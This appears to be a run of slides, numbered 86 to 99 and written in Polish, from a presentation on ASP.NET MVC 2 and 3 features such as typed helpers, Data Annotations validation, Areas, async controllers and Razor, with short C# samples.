 86. 86. Silnie typowane Helpery • Nowe helpery dla silnie typowanych widoków – ValidationMessageFor(o => o.Imie) – TextAreaFor(o => o.Imie) – TextBoxFor(o => o.Opis) – HiddenFor(o => o.Tag) – DropDownListFor(o => o.Zawod) – LabelFor(o => o.Imie) • Kontrola podczas kompilacji • A można jeszcze szybciej <%= Html.EditorFor(o => o) %> <%= Html.DisplayFor(o => o) %> • Szablony – kontrolka ascx (Dynamic Data? ) – Shared/EditorTemplates oraz Shares/DisplayTemplates – Dla typu z modelu (np. Customer) [UIHint(„CountryDropDown”+ <%= Html.EditorFor(c => c.Country, „CountryDropDown”); – Dla typu danych (np. [DataType(DataType.EmailAddress)])
 87. 87. Data Annotations public class Pals { [Required()] [Range(33, 99)] public float Height { get; set; } [Required()] [StringLength(7)] public string Name { get; set; } [ScaffoldColumn(false)] public int ID { get; set; } public bool cool { get; set; } [DataType(DataType.EmailAddress)] [RegularExpression(@"^([0-9a-zA-Z]([-.w]*[0-9a-zA-Z])*@([0-9a-zA-Z][- w]*[0-9a-zA-Z].)+[a-zA-Z]{2,9})$")] public string email { get; set; } [DataType(DataType.MultilineText)] public string Bio { get; set; } } // W Post: if (!ModelState.IsValid) …
 88. 88. Data Annotations – a może separacja? // Customer.cs - partial // Customer.metadata.cs // tzw. „Buddy class‛ [MetadataType(typeof(CustomerMetaData))] public partial class Customer { class CustomerMetaData { [Required(ErrorMessage="You must supply a name for a customer.")] [StringLength(50, ErrorMessage = "A customer name cannot exceed 50 characters.")] public string Name { get; set; } } }
 89. 89. Custom Validation public class PriceAttribute : ValidationAttribute { public double MinPrice { get; set; } public override bool IsValid(object value) { if (value == null) { return true; } var price = (double)value; if (price < MinPrice) { return false; } double cents = price - Math.Truncate(price); if (cents < 0.99 || cents >= 0.995) { return false; } return true; } } // [Price(MinPrice = 1.99)]
 90. 90. Client Validation • Działa zarówno z Microsoft AJAX jak i jQuery • <% Html.EnableClientValidation(); %> – Przed BeginForm() – Kontrolki dodatkowo uzyskują walidację po stronie klienta!
 91. 91. Areas • Podział skomplikowanego projektu na mniejsze moduły
 92. 92. Areas public class BlogsAreaRegistration : AreaRegistration { public override string AreaName { get { return "Blogs"; } } public override void RegisterArea(AreaRegistrationContext context) { context.MapRoute( "Blogs_default", "Blogs/{controller}/{action}/{id}", new { action = "Index", id = "" } ); } } // W Application_Start() // AreaRegistration.RegisterAllAreas();
 93. 93. Asynchroniczny kontroler (skalowalnośd!) public class PortalController : AsyncController { public void IndexAsync(string city) { AsyncManager.OutstandingOperations.Increment(2); NewsService newsService = new NewsService(); newsService.GetHeadlinesCompleted += (sender, e) => { AsyncManager.Parameters["headlines"] = e.Value; AsyncManager.OutstandingOperations.Decrement(); }; newsService.GetHeadlinesAsync(); WeatherService weatherService = new WeatherService(); weatherService.GetForecastCompleted += (sender, e) => { AsyncManager.Parameters["forecast"] = e.Value; AsyncManager.OutstandingOperations.Decrement(); }; weatherService.GetForecastAsync(); } public ActionResult IndexCompleted(string[] headlines, string[] forecast) { return View("Common", new PortalViewModel { NewsHeadlines = headlines, Weather = forecast }); } }
 94. 94. Inne • [HttpPost] – krócej • Wartości domyślne parametrów akcji – public ActionResult Edytuj(string cat, [DefaultValue(1)] int page) { } • <% Html.RenderAction() %> (ViewResult) i <% Html.Action %> – Renderuje wynik akcji – Cały cykl życia „strony” – np. inny model, itp. • Blank project template
 95. 95. CO NOWEGO W ASP.NET MVC 3? (wybrane)
 96. 96. Widoki • Razor – @* *@ – @model – Layout, _viewstart.cshtml – Html.Raw – Helpery: Chart, WebGrid, Crypto, WebImage, WebMail • Wiele silników widoków – Spark, Nhaml, NDjango
 97. 97. Nowości – c.d. • Golbal Action Filters • ViewBag • Nowe ActionResults – HttpNotFoundResult, RedirectResult, HtpStatusC odeResult • AJAX – „unobtrusive” – jQueryValidate
 98. 98. Remote Validator
 99. 99. • JSON Binding • Nowe adnotacje (np. Compare) • NuGet • Partial-Page Output Caching • Request validation – [AllowHtml]

×